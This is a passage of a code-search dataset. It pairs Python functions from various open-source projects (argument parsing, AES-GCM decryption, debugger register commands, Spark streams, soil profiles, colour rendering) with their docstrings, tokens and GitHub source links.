[ "def", "parse_arguments", "(", "args", ")", ":", "parser", "=", "argparse", ".", "ArgumentParser", "(", "description", "=", "'Convert JAMS to .lab files'", ")", "parser", ".", "add_argument", "(", "'-c'", ",", "'--comma-separated'", ",", "dest", "=", "'csv'", ",", "action", "=", "'store_true'", ",", "default", "=", "False", ",", "help", "=", "'Output in .csv instead of .lab'", ")", "parser", ".", "add_argument", "(", "'--comment'", ",", "dest", "=", "'comment_char'", ",", "type", "=", "str", ",", "default", "=", "'#'", ",", "help", "=", "'Comment character'", ")", "parser", ".", "add_argument", "(", "'-n'", ",", "'--namespace'", ",", "dest", "=", "'namespaces'", ",", "nargs", "=", "'+'", ",", "default", "=", "[", "'.*'", "]", ",", "help", "=", "'One or more namespaces to output. Default is all.'", ")", "parser", ".", "add_argument", "(", "'jams_file'", ",", "help", "=", "'Path to the input jams file'", ")", "parser", ".", "add_argument", "(", "'output_prefix'", ",", "help", "=", "'Prefix for output files'", ")", "return", "vars", "(", "parser", ".", "parse_args", "(", "args", ")", ")" ]
Parse arguments from the command line
[ "Parse", "arguments", "from", "the", "command", "line" ]
python
valid
37.148148
phoebe-project/phoebe2
phoebe/backend/universe.py
https://github.com/phoebe-project/phoebe2/blob/e64b8be683977064e2d55dd1b3ac400f64c3e379/phoebe/backend/universe.py#L1370-L1375
def polar_direction_xyz(self): """ get current polar direction in Roche (xyz) coordinates """ return mesh.spin_in_roche(self.polar_direction_uvw, self.true_anom, self.elongan, self.eincl).astype(float)
[ "def", "polar_direction_xyz", "(", "self", ")", ":", "return", "mesh", ".", "spin_in_roche", "(", "self", ".", "polar_direction_uvw", ",", "self", ".", "true_anom", ",", "self", ".", "elongan", ",", "self", ".", "eincl", ")", ".", "astype", "(", "float", ")" ]
get current polar direction in Roche (xyz) coordinates
[ "get", "current", "polar", "direction", "in", "Roche", "(", "xyz", ")", "coordinates" ]
python
train
43.666667
latchset/jwcrypto
jwcrypto/jwa.py
https://github.com/latchset/jwcrypto/blob/961df898dc08f63fe3d900f2002618740bc66b4a/jwcrypto/jwa.py#L979-L994
def decrypt(self, k, a, iv, e, t): """ Decrypt accoriding to the selected encryption and hashing functions. :param k: Encryption key (optional) :param a: Additional Authenticated Data :param iv: Initialization Vector :param e: Ciphertext :param t: Authentication Tag Returns plaintext or raises an error """ cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t), backend=self.backend) decryptor = cipher.decryptor() decryptor.authenticate_additional_data(a) return decryptor.update(e) + decryptor.finalize()
[ "def", "decrypt", "(", "self", ",", "k", ",", "a", ",", "iv", ",", "e", ",", "t", ")", ":", "cipher", "=", "Cipher", "(", "algorithms", ".", "AES", "(", "k", ")", ",", "modes", ".", "GCM", "(", "iv", ",", "t", ")", ",", "backend", "=", "self", ".", "backend", ")", "decryptor", "=", "cipher", ".", "decryptor", "(", ")", "decryptor", ".", "authenticate_additional_data", "(", "a", ")", "return", "decryptor", ".", "update", "(", "e", ")", "+", "decryptor", ".", "finalize", "(", ")" ]
Decrypt accoriding to the selected encryption and hashing functions. :param k: Encryption key (optional) :param a: Additional Authenticated Data :param iv: Initialization Vector :param e: Ciphertext :param t: Authentication Tag Returns plaintext or raises an error
[ "Decrypt", "accoriding", "to", "the", "selected", "encryption", "and", "hashing", "functions", ".", ":", "param", "k", ":", "Encryption", "key", "(", "optional", ")", ":", "param", "a", ":", "Additional", "Authenticated", "Data", ":", "param", "iv", ":", "Initialization", "Vector", ":", "param", "e", ":", "Ciphertext", ":", "param", "t", ":", "Authentication", "Tag" ]
python
train
38.6875
fabioz/PyDev.Debugger
pydevd_attach_to_process/winappdbg/interactive.py
https://github.com/fabioz/PyDev.Debugger/blob/ed9c4307662a5593b8a7f1f3389ecd0e79b8c503/pydevd_attach_to_process/winappdbg/interactive.py#L2012-L2050
def do_register(self, arg): """ [~thread] r - print(the value of all registers [~thread] r <register> - print(the value of a register [~thread] r <register>=<value> - change the value of a register [~thread] register - print(the value of all registers [~thread] register <register> - print(the value of a register [~thread] register <register>=<value> - change the value of a register """ arg = arg.strip() if not arg: self.print_current_location() else: equ = arg.find('=') if equ >= 0: register = arg[:equ].strip() value = arg[equ+1:].strip() if not value: value = '0' self.change_register(register, value) else: value = self.input_register(arg) if value is None: raise CmdError("unknown register: %s" % arg) try: label = None thread = self.get_thread_from_prefix() process = thread.get_process() module = process.get_module_at_address(value) if module: label = module.get_label_at_address(value) except RuntimeError: label = None reg = arg.upper() val = HexDump.address(value) if label: print("%s: %s (%s)" % (reg, val, label)) else: print("%s: %s" % (reg, val))
[ "def", "do_register", "(", "self", ",", "arg", ")", ":", "arg", "=", "arg", ".", "strip", "(", ")", "if", "not", "arg", ":", "self", ".", "print_current_location", "(", ")", "else", ":", "equ", "=", "arg", ".", "find", "(", "'='", ")", "if", "equ", ">=", "0", ":", "register", "=", "arg", "[", ":", "equ", "]", ".", "strip", "(", ")", "value", "=", "arg", "[", "equ", "+", "1", ":", "]", ".", "strip", "(", ")", "if", "not", "value", ":", "value", "=", "'0'", "self", ".", "change_register", "(", "register", ",", "value", ")", "else", ":", "value", "=", "self", ".", "input_register", "(", "arg", ")", "if", "value", "is", "None", ":", "raise", "CmdError", "(", "\"unknown register: %s\"", "%", "arg", ")", "try", ":", "label", "=", "None", "thread", "=", "self", ".", "get_thread_from_prefix", "(", ")", "process", "=", "thread", ".", "get_process", "(", ")", "module", "=", "process", ".", "get_module_at_address", "(", "value", ")", "if", "module", ":", "label", "=", "module", ".", "get_label_at_address", "(", "value", ")", "except", "RuntimeError", ":", "label", "=", "None", "reg", "=", "arg", ".", "upper", "(", ")", "val", "=", "HexDump", ".", "address", "(", "value", ")", "if", "label", ":", "print", "(", "\"%s: %s (%s)\"", "%", "(", "reg", ",", "val", ",", "label", ")", ")", "else", ":", "print", "(", "\"%s: %s\"", "%", "(", "reg", ",", "val", ")", ")" ]
[~thread] r - print(the value of all registers [~thread] r <register> - print(the value of a register [~thread] r <register>=<value> - change the value of a register [~thread] register - print(the value of all registers [~thread] register <register> - print(the value of a register [~thread] register <register>=<value> - change the value of a register
[ "[", "~thread", "]", "r", "-", "print", "(", "the", "value", "of", "all", "registers", "[", "~thread", "]", "r", "<register", ">", "-", "print", "(", "the", "value", "of", "a", "register", "[", "~thread", "]", "r", "<register", ">", "=", "<value", ">", "-", "change", "the", "value", "of", "a", "register", "[", "~thread", "]", "register", "-", "print", "(", "the", "value", "of", "all", "registers", "[", "~thread", "]", "register", "<register", ">", "-", "print", "(", "the", "value", "of", "a", "register", "[", "~thread", "]", "register", "<register", ">", "=", "<value", ">", "-", "change", "the", "value", "of", "a", "register" ]
python
train
40.666667
Esri/ArcREST
samples/query_agol_layer_using_ArcMap_Creds.py
https://github.com/Esri/ArcREST/blob/ab240fde2b0200f61d4a5f6df033516e53f2f416/samples/query_agol_layer_using_ArcMap_Creds.py#L43-L77
def main(*argv): """ main driver of program """ try: url = str(argv[0]) arcgisSH = ArcGISTokenSecurityHandler() if arcgisSH.valid == False: arcpy.AddError(arcgisSH.message) return fl = FeatureLayer( url=url, securityHandler=arcgisSH, initialize=True) res = fl.query(where="1=1",out_fields='*',returnGeometry=False) arcpy.AddMessage(res) arcpy.SetParameterAsText(1, str(res)) except arcpy.ExecuteError: line, filename, synerror = trace() arcpy.AddError("error on line: %s" % line) arcpy.AddError("error in file name: %s" % filename) arcpy.AddError("with error message: %s" % synerror) arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2)) except FunctionError, f_e: messages = f_e.args[0] arcpy.AddError("error in function: %s" % messages["function"]) arcpy.AddError("error on line: %s" % messages["line"]) arcpy.AddError("error in file name: %s" % messages["filename"]) arcpy.AddError("with error message: %s" % messages["synerror"]) arcpy.AddError("ArcPy Error Message: %s" % messages["arc"]) except: line, filename, synerror = trace() arcpy.AddError("error on line: %s" % line) arcpy.AddError("error in file name: %s" % filename) arcpy.AddError("with error message: %s" % synerror)
[ "def", "main", "(", "*", "argv", ")", ":", "try", ":", "url", "=", "str", "(", "argv", "[", "0", "]", ")", "arcgisSH", "=", "ArcGISTokenSecurityHandler", "(", ")", "if", "arcgisSH", ".", "valid", "==", "False", ":", "arcpy", ".", "AddError", "(", "arcgisSH", ".", "message", ")", "return", "fl", "=", "FeatureLayer", "(", "url", "=", "url", ",", "securityHandler", "=", "arcgisSH", ",", "initialize", "=", "True", ")", "res", "=", "fl", ".", "query", "(", "where", "=", "\"1=1\"", ",", "out_fields", "=", "'*'", ",", "returnGeometry", "=", "False", ")", "arcpy", ".", "AddMessage", "(", "res", ")", "arcpy", ".", "SetParameterAsText", "(", "1", ",", "str", "(", "res", ")", ")", "except", "arcpy", ".", "ExecuteError", ":", "line", ",", "filename", ",", "synerror", "=", "trace", "(", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "line", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "filename", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "synerror", ")", "arcpy", ".", "AddError", "(", "\"ArcPy Error Message: %s\"", "%", "arcpy", ".", "GetMessages", "(", "2", ")", ")", "except", "FunctionError", ",", "f_e", ":", "messages", "=", "f_e", ".", "args", "[", "0", "]", "arcpy", ".", "AddError", "(", "\"error in function: %s\"", "%", "messages", "[", "\"function\"", "]", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "messages", "[", "\"line\"", "]", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "messages", "[", "\"filename\"", "]", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "messages", "[", "\"synerror\"", "]", ")", "arcpy", ".", "AddError", "(", "\"ArcPy Error Message: %s\"", "%", "messages", "[", "\"arc\"", "]", ")", "except", ":", "line", ",", "filename", ",", "synerror", "=", "trace", "(", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "line", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "filename", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "synerror", ")" ]
main driver of program
[ "main", "driver", "of", "program" ]
python
train
40.514286
apache/spark
python/pyspark/streaming/context.py
https://github.com/apache/spark/blob/618d6bff71073c8c93501ab7392c3cc579730f0b/python/pyspark/streaming/context.py#L331-L348
def union(self, *dstreams): """ Create a unified DStream from multiple DStreams of the same type and same slide duration. """ if not dstreams: raise ValueError("should have at least one DStream to union") if len(dstreams) == 1: return dstreams[0] if len(set(s._jrdd_deserializer for s in dstreams)) > 1: raise ValueError("All DStreams should have same serializer") if len(set(s._slideDuration for s in dstreams)) > 1: raise ValueError("All DStreams should have same slide duration") cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream jdstreams = SparkContext._gateway.new_array(cls, len(dstreams)) for i in range(0, len(dstreams)): jdstreams[i] = dstreams[i]._jdstream return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer)
[ "def", "union", "(", "self", ",", "*", "dstreams", ")", ":", "if", "not", "dstreams", ":", "raise", "ValueError", "(", "\"should have at least one DStream to union\"", ")", "if", "len", "(", "dstreams", ")", "==", "1", ":", "return", "dstreams", "[", "0", "]", "if", "len", "(", "set", "(", "s", ".", "_jrdd_deserializer", "for", "s", "in", "dstreams", ")", ")", ">", "1", ":", "raise", "ValueError", "(", "\"All DStreams should have same serializer\"", ")", "if", "len", "(", "set", "(", "s", ".", "_slideDuration", "for", "s", "in", "dstreams", ")", ")", ">", "1", ":", "raise", "ValueError", "(", "\"All DStreams should have same slide duration\"", ")", "cls", "=", "SparkContext", ".", "_jvm", ".", "org", ".", "apache", ".", "spark", ".", "streaming", ".", "api", ".", "java", ".", "JavaDStream", "jdstreams", "=", "SparkContext", ".", "_gateway", ".", "new_array", "(", "cls", ",", "len", "(", "dstreams", ")", ")", "for", "i", "in", "range", "(", "0", ",", "len", "(", "dstreams", ")", ")", ":", "jdstreams", "[", "i", "]", "=", "dstreams", "[", "i", "]", ".", "_jdstream", "return", "DStream", "(", "self", ".", "_jssc", ".", "union", "(", "jdstreams", ")", ",", "self", ",", "dstreams", "[", "0", "]", ".", "_jrdd_deserializer", ")" ]
Create a unified DStream from multiple DStreams of the same type and same slide duration.
[ "Create", "a", "unified", "DStream", "from", "multiple", "DStreams", "of", "the", "same", "type", "and", "same", "slide", "duration", "." ]
python
train
50.555556
tensorflow/cleverhans
cleverhans/experimental/certification/utils.py
https://github.com/tensorflow/cleverhans/blob/97488e215760547b81afc53f5e5de8ba7da5bd98/cleverhans/experimental/certification/utils.py#L22-L93
def initialize_dual(neural_net_params_object, init_dual_file=None, random_init_variance=0.01, init_nu=200.0): """Function to initialize the dual variables of the class. Args: neural_net_params_object: Object with the neural net weights, biases and types init_dual_file: Path to file containing dual variables, if the path is empty, perform random initialization Expects numpy dictionary with lambda_pos_0, lambda_pos_1, .. lambda_neg_0, lambda_neg_1, .. lambda_quad_0, lambda_quad_1, .. lambda_lu_0, lambda_lu_1, .. random_init_variance: variance for random initialization init_nu: Value to initialize nu variable with Returns: dual_var: dual variables initialized appropriately. """ lambda_pos = [] lambda_neg = [] lambda_quad = [] lambda_lu = [] if init_dual_file is None: for i in range(0, neural_net_params_object.num_hidden_layers + 1): initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_pos.append(tf.get_variable('lambda_pos_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_neg.append(tf.get_variable('lambda_neg_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_quad.append(tf.get_variable('lambda_quad_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_lu.append(tf.get_variable('lambda_lu_' + str(i), initializer=initializer, dtype=tf.float32)) nu = tf.get_variable('nu', initializer=init_nu) else: # Loading from file dual_var_init_val = np.load(init_dual_file).item() for i in range(0, neural_net_params_object.num_hidden_layers + 1): lambda_pos.append( tf.get_variable('lambda_pos_' + str(i), initializer=dual_var_init_val['lambda_pos'][i], dtype=tf.float32)) lambda_neg.append( tf.get_variable('lambda_neg_' + str(i), initializer=dual_var_init_val['lambda_neg'][i], dtype=tf.float32)) lambda_quad.append( tf.get_variable('lambda_quad_' + str(i), initializer=dual_var_init_val['lambda_quad'][i], dtype=tf.float32)) lambda_lu.append( tf.get_variable('lambda_lu_' + str(i), initializer=dual_var_init_val['lambda_lu'][i], dtype=tf.float32)) nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu']) dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg, 'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu} return dual_var
[ "def", "initialize_dual", "(", "neural_net_params_object", ",", "init_dual_file", "=", "None", ",", "random_init_variance", "=", "0.01", ",", "init_nu", "=", "200.0", ")", ":", "lambda_pos", "=", "[", "]", "lambda_neg", "=", "[", "]", "lambda_quad", "=", "[", "]", "lambda_lu", "=", "[", "]", "if", "init_dual_file", "is", "None", ":", "for", "i", "in", "range", "(", "0", ",", "neural_net_params_object", ".", "num_hidden_layers", "+", "1", ")", ":", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_pos", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_pos_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_neg", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_neg_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_quad", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_quad_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_lu", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_lu_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "nu", "=", "tf", ".", "get_variable", "(", "'nu'", ",", "initializer", "=", "init_nu", ")", "else", ":", "# Loading from file", "dual_var_init_val", "=", "np", ".", "load", "(", "init_dual_file", ")", ".", "item", "(", ")", "for", "i", "in", "range", "(", "0", ",", "neural_net_params_object", ".", "num_hidden_layers", "+", "1", ")", ":", "lambda_pos", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_pos_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_pos'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_neg", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_neg_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_neg'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_quad", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_quad_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_quad'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_lu", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_lu_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_lu'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "nu", "=", "tf", ".", "get_variable", "(", "'nu'", ",", "initializer", "=", "1.0", "*", "dual_var_init_val", "[", "'nu'", "]", ")", "dual_var", "=", "{", "'lambda_pos'", ":", "lambda_pos", ",", "'lambda_neg'", ":", "lambda_neg", ",", "'lambda_quad'", ":", "lambda_quad", ",", "'lambda_lu'", ":", "lambda_lu", ",", "'nu'", ":", "nu", "}", "return", "dual_var" ]
Function to initialize the dual variables of the class. Args: neural_net_params_object: Object with the neural net weights, biases and types init_dual_file: Path to file containing dual variables, if the path is empty, perform random initialization Expects numpy dictionary with lambda_pos_0, lambda_pos_1, .. lambda_neg_0, lambda_neg_1, .. lambda_quad_0, lambda_quad_1, .. lambda_lu_0, lambda_lu_1, .. random_init_variance: variance for random initialization init_nu: Value to initialize nu variable with Returns: dual_var: dual variables initialized appropriately.
[ "Function", "to", "initialize", "the", "dual", "variables", "of", "the", "class", "." ]
python
train
47.347222
nerdvegas/rez
src/rez/vendor/pygraph/classes/graph.py
https://github.com/nerdvegas/rez/blob/1d3b846d53b5b5404edfe8ddb9083f9ceec8c5e7/src/rez/vendor/pygraph/classes/graph.py#L170-L182
def del_edge(self, edge): """ Remove an edge from the graph. @type edge: tuple @param edge: Edge. """ u, v = edge self.node_neighbors[u].remove(v) self.del_edge_labeling((u, v)) if (u != v): self.node_neighbors[v].remove(u) self.del_edge_labeling((v, u))
[ "def", "del_edge", "(", "self", ",", "edge", ")", ":", "u", ",", "v", "=", "edge", "self", ".", "node_neighbors", "[", "u", "]", ".", "remove", "(", "v", ")", "self", ".", "del_edge_labeling", "(", "(", "u", ",", "v", ")", ")", "if", "(", "u", "!=", "v", ")", ":", "self", ".", "node_neighbors", "[", "v", "]", ".", "remove", "(", "u", ")", "self", ".", "del_edge_labeling", "(", "(", "v", ",", "u", ")", ")" ]
Remove an edge from the graph. @type edge: tuple @param edge: Edge.
[ "Remove", "an", "edge", "from", "the", "graph", "." ]
python
train
26.307692
eng-tools/sfsimodels
sfsimodels/models/soils.py
https://github.com/eng-tools/sfsimodels/blob/65a690ca440d61307f5a9b8478e4704f203a5925/sfsimodels/models/soils.py#L1272-L1312
def discretize_soil_profile(sp, incs=None, target=1.0): """ Splits the soil profile into slices and stores as dictionary :param sp: SoilProfile :param incs: array_like, increments of depth to use for each layer :param target: target depth increment size :return: dict """ if incs is None: incs = np.ones(sp.n_layers) * target dd = {} dd["thickness"] = [] dd["unit_mass"] = [] dd["shear_vel"] = [] cum_thickness = 0 for i in range(sp.n_layers): sl = sp.layer(i + 1) thickness = sp.layer_height(i + 1) n_slices = max(int(thickness / incs[i]), 1) slice_thickness = float(thickness) / n_slices for j in range(n_slices): cum_thickness += slice_thickness if cum_thickness >= sp.gwl: rho = sl.unit_sat_mass saturation = True else: rho = sl.unit_dry_mass saturation = False if hasattr(sl, "get_shear_vel_at_v_eff_stress"): v_eff = sp.vertical_effective_stress(cum_thickness) vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation) else: vs = sl.calc_shear_vel(saturation) dd["shear_vel"].append(vs) dd["unit_mass"].append(rho) dd["thickness"].append(slice_thickness) for item in dd: dd[item] = np.array(dd[item]) return dd
[ "def", "discretize_soil_profile", "(", "sp", ",", "incs", "=", "None", ",", "target", "=", "1.0", ")", ":", "if", "incs", "is", "None", ":", "incs", "=", "np", ".", "ones", "(", "sp", ".", "n_layers", ")", "*", "target", "dd", "=", "{", "}", "dd", "[", "\"thickness\"", "]", "=", "[", "]", "dd", "[", "\"unit_mass\"", "]", "=", "[", "]", "dd", "[", "\"shear_vel\"", "]", "=", "[", "]", "cum_thickness", "=", "0", "for", "i", "in", "range", "(", "sp", ".", "n_layers", ")", ":", "sl", "=", "sp", ".", "layer", "(", "i", "+", "1", ")", "thickness", "=", "sp", ".", "layer_height", "(", "i", "+", "1", ")", "n_slices", "=", "max", "(", "int", "(", "thickness", "/", "incs", "[", "i", "]", ")", ",", "1", ")", "slice_thickness", "=", "float", "(", "thickness", ")", "/", "n_slices", "for", "j", "in", "range", "(", "n_slices", ")", ":", "cum_thickness", "+=", "slice_thickness", "if", "cum_thickness", ">=", "sp", ".", "gwl", ":", "rho", "=", "sl", ".", "unit_sat_mass", "saturation", "=", "True", "else", ":", "rho", "=", "sl", ".", "unit_dry_mass", "saturation", "=", "False", "if", "hasattr", "(", "sl", ",", "\"get_shear_vel_at_v_eff_stress\"", ")", ":", "v_eff", "=", "sp", ".", "vertical_effective_stress", "(", "cum_thickness", ")", "vs", "=", "sl", ".", "get_shear_vel_at_v_eff_stress", "(", "v_eff", ",", "saturation", ")", "else", ":", "vs", "=", "sl", ".", "calc_shear_vel", "(", "saturation", ")", "dd", "[", "\"shear_vel\"", "]", ".", "append", "(", "vs", ")", "dd", "[", "\"unit_mass\"", "]", ".", "append", "(", "rho", ")", "dd", "[", "\"thickness\"", "]", ".", "append", "(", "slice_thickness", ")", "for", "item", "in", "dd", ":", "dd", "[", "item", "]", "=", "np", ".", "array", "(", "dd", "[", "item", "]", ")", "return", "dd" ]
Splits the soil profile into slices and stores as dictionary :param sp: SoilProfile :param incs: array_like, increments of depth to use for each layer :param target: target depth increment size :return: dict
[ "Splits", "the", "soil", "profile", "into", "slices", "and", "stores", "as", "dictionary" ]
python
train
34.268293
BerkeleyAutomation/perception
perception/image.py
https://github.com/BerkeleyAutomation/perception/blob/03d9b37dd6b66896cdfe173905c9413c8c3c5df6/perception/image.py#L973-L993
def _check_valid_data(self, data): """Checks that the given data is a uint8 array with one or three channels. Parameters ---------- data : :obj:`numpy.ndarray` The data to check. Raises ------ ValueError If the data is invalid. """ if data.dtype.type is not np.uint8: raise ValueError( 'Illegal data type. Color images only support uint8 arrays') if len(data.shape) != 3 or data.shape[2] != 3: raise ValueError( 'Illegal data type. Color images only support three channels')
[ "def", "_check_valid_data", "(", "self", ",", "data", ")", ":", "if", "data", ".", "dtype", ".", "type", "is", "not", "np", ".", "uint8", ":", "raise", "ValueError", "(", "'Illegal data type. Color images only support uint8 arrays'", ")", "if", "len", "(", "data", ".", "shape", ")", "!=", "3", "or", "data", ".", "shape", "[", "2", "]", "!=", "3", ":", "raise", "ValueError", "(", "'Illegal data type. Color images only support three channels'", ")" ]
Checks that the given data is a uint8 array with one or three channels. Parameters ---------- data : :obj:`numpy.ndarray` The data to check. Raises ------ ValueError If the data is invalid.
[ "Checks", "that", "the", "given", "data", "is", "a", "uint8", "array", "with", "one", "or", "three", "channels", "." ]
python
train
29.761905
koalalorenzo/python-digitalocean
digitalocean/Image.py
https://github.com/koalalorenzo/python-digitalocean/blob/d0221b57856fb1e131cafecf99d826f7b07a947c/digitalocean/Image.py#L64-L78
def get_object(cls, api_token, image_id_or_slug): """ Class method that will return an Image object by ID or slug. This method is used to validate the type of the image. If it is a number, it will be considered as an Image ID, instead if it is a string, it will considered as slug. """ if cls._is_string(image_id_or_slug): image = cls(token=api_token, slug=image_id_or_slug) image.load(use_slug=True) else: image = cls(token=api_token, id=image_id_or_slug) image.load() return image
[ "def", "get_object", "(", "cls", ",", "api_token", ",", "image_id_or_slug", ")", ":", "if", "cls", ".", "_is_string", "(", "image_id_or_slug", ")", ":", "image", "=", "cls", "(", "token", "=", "api_token", ",", "slug", "=", "image_id_or_slug", ")", "image", ".", "load", "(", "use_slug", "=", "True", ")", "else", ":", "image", "=", "cls", "(", "token", "=", "api_token", ",", "id", "=", "image_id_or_slug", ")", "image", ".", "load", "(", ")", "return", "image" ]
Class method that will return an Image object by ID or slug. This method is used to validate the type of the image. If it is a number, it will be considered as an Image ID, instead if it is a string, it will considered as slug.
[ "Class", "method", "that", "will", "return", "an", "Image", "object", "by", "ID", "or", "slug", "." ]
python
valid
40.333333
Kronuz/pyScss
scss/types.py
https://github.com/Kronuz/pyScss/blob/fb32b317f6e2b4b4aad2b86a74844658ac4aa11e/scss/types.py#L1003-L1046
def render(self, compress=False): """Return a rendered representation of the color. If `compress` is true, the shortest possible representation is used; otherwise, named colors are rendered as names and all others are rendered as hex (or with the rgba function). """ if not compress and self.original_literal: return self.original_literal candidates = [] # TODO this assumes CSS resolution is 8-bit per channel, but so does # Ruby. r, g, b, a = self.value r, g, b = int(round(r)), int(round(g)), int(round(b)) # Build a candidate list in order of preference. If `compress` is # True, the shortest candidate is used; otherwise, the first candidate # is used. # Try color name key = r, g, b, a if key in COLOR_LOOKUP: candidates.append(COLOR_LOOKUP[key]) if a == 1: # Hex is always shorter than function notation if all(ch % 17 == 0 for ch in (r, g, b)): candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17)) else: candidates.append("#%02x%02x%02x" % (r, g, b)) else: # Can't use hex notation for RGBA if compress: sp = '' else: sp = ' ' candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a)) if compress: return min(candidates, key=len) else: return candidates[0]
[ "def", "render", "(", "self", ",", "compress", "=", "False", ")", ":", "if", "not", "compress", "and", "self", ".", "original_literal", ":", "return", "self", ".", "original_literal", "candidates", "=", "[", "]", "# TODO this assumes CSS resolution is 8-bit per channel, but so does", "# Ruby.", "r", ",", "g", ",", "b", ",", "a", "=", "self", ".", "value", "r", ",", "g", ",", "b", "=", "int", "(", "round", "(", "r", ")", ")", ",", "int", "(", "round", "(", "g", ")", ")", ",", "int", "(", "round", "(", "b", ")", ")", "# Build a candidate list in order of preference. If `compress` is", "# True, the shortest candidate is used; otherwise, the first candidate", "# is used.", "# Try color name", "key", "=", "r", ",", "g", ",", "b", ",", "a", "if", "key", "in", "COLOR_LOOKUP", ":", "candidates", ".", "append", "(", "COLOR_LOOKUP", "[", "key", "]", ")", "if", "a", "==", "1", ":", "# Hex is always shorter than function notation", "if", "all", "(", "ch", "%", "17", "==", "0", "for", "ch", "in", "(", "r", ",", "g", ",", "b", ")", ")", ":", "candidates", ".", "append", "(", "\"#%1x%1x%1x\"", "%", "(", "r", "//", "17", ",", "g", "//", "17", ",", "b", "//", "17", ")", ")", "else", ":", "candidates", ".", "append", "(", "\"#%02x%02x%02x\"", "%", "(", "r", ",", "g", ",", "b", ")", ")", "else", ":", "# Can't use hex notation for RGBA", "if", "compress", ":", "sp", "=", "''", "else", ":", "sp", "=", "' '", "candidates", ".", "append", "(", "\"rgba(%d,%s%d,%s%d,%s%.6g)\"", "%", "(", "r", ",", "sp", ",", "g", ",", "sp", ",", "b", ",", "sp", ",", "a", ")", ")", "if", "compress", ":", "return", "min", "(", "candidates", ",", "key", "=", "len", ")", "else", ":", "return", "candidates", "[", "0", "]" ]
Return a rendered representation of the color. If `compress` is true, the shortest possible representation is used; otherwise, named colors are rendered as names and all others are rendered as hex (or with the rgba function).
[ "Return", "a", "rendered", "representation", "of", "the", "color", ".", "If", "compress", "is", "true", "the", "shortest", "possible", "representation", "is", "used", ";", "otherwise", "named", "colors", "are", "rendered", "as", "names", "and", "all", "others", "are", "rendered", "as", "hex", "(", "or", "with", "the", "rgba", "function", ")", "." ]
python
train
34.522727
cloud9ers/gurumate
environment/lib/python2.7/site-packages/IPython/parallel/controller/sqlitedb.py
